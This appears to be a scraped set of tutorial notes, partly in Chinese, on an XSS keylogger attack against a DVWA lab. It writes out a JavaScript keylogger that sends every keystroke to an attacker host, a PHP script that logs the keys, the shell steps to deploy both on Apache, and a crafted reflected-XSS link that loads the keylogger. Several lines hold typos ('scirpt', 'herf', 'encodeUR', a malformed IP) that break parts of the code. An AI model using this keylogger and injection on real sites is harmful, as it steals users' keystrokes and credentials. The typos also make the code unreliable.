XSS Keylogger.js document.onkeypress = function(evt){ evt = evt || window.event key = String.fromCharCode(evt.charCode) if(key){ var http = new XMLHttpRequest(); var param = encodeUR(key); http.open("POST","http://192.168.20.8/keylogger.php",true); http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); http.send("key="+param); } } |
root@R:~# service apache2 start
root@R:~# cd /var/www/html/
root@R:/var/www/html# gedit keylogger.js
document.onkeypress = function(evt){
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if(key){
var http = new XMLHttpRequest();
var param = encodeUR(key);
http.open("POST","http://192.168.20.8/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
XSS Keylogger.php <?php $key=$_POST['key']; $logfile="keylog.txt"; $fp = fopen($logfile,"a"); fwrite($fp,$key); fclose($fp); ?> <scirpt+src="http://1.1.1.1/keylogger.js"></script> <a herf="http://192.168.20.10/dvwa/vulnerabilites/xss_r/?name=<script+src=' http://192.168.1.20.8/keylogger.js'></script>">xss</a> |
root@R:/var/www/html# gedit keylogger.php
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
?>
root@R:/var/www/html# gedit keylogger.txt
root@R:/var/www/html# ls
index.html keylogger.js keylogger.php keylog.txt
root@R:/var/www/html# chmod 777 keylog.txt
root@R:/var/www/html# gedit a.html
<a herf="http://192.168.1.107/dvwa/vulnerabilites/xss_r/?name=<script+src='http://192.168.1.1.102/keylogger.js'></script>">xss</a>
XSS Xsser 命令/图形化 工具 绕过服务器端输入筛选 10进制/16进制 编码 |